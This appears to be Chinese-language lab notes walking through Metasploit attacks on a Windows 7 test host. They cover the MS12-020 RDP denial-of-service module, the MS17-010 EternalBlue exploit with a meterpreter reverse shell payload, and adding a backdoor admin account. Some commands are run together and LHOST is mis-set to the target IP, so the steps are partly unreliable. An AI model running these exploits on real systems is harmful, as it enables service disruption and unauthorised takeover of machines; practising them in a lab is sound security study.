MS12-020

msfconsole 从终端进入msf框架

msfconsole

查找漏洞 search 12_020

search 12_020 

使用该漏洞利用代码

 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

查看使用方法

 show options 

查看靶机的ip地址

ipconfig

查看靶机开放端口

netstat -ano

开发3389端口

设置参数

 set RHOST 192.168.74.134 
 set RPORT 3389 

查看

show options

攻击

exploit 

MS17-010

msfconsole 从终端进入msf框架

msfconsole

查找MS17-010相关利用代码

search 17_010 

检测内网中存在漏洞的主机系统

use auxiliary/scanner/smb/smb_ms17_010 show options  

查看445端口是否开放

设置参数

set RHOST 192.168.74.134/24show options  

run 出现加号可入侵

run

使用模块进行入侵

search ms17_010

调用永恒之蓝攻击模块

use exploit/windows/smb/ms17_010_eternalblue show options  

设置参数

 set RHOST 192.168.74.134 set payload windows/x64/meterpreter/reverse_tcp payload set LHOST 192.168.74.134 show options

攻击

 run

创建一个ammin用户

net user admin 123456 /add

到靶机查看

net user

参考资料

[win7旗舰版怎么开启3389端口?](win7旗舰版怎么开启3389端口?_百度知道 (baidu.com))

[win7怎么打开端口](win7怎么打开端口-百度经验 (baidu.com))

[Metasploit(MSF)快速使用MS12-020、MS17-010(永恒之蓝)漏洞](Metasploit(MSF)快速使用MS12-020、MS17-010(永恒之蓝)漏洞 - 哔哩哔哩专栏 (bilibili.com))

[关于使用msf渗透攻击Win7主机并远程执行命令的复习]((1条消息) 关于使用msf渗透攻击Win7主机并远程执行命令的复习_LIKEQC的博客-CSDN博客_msf攻击win7)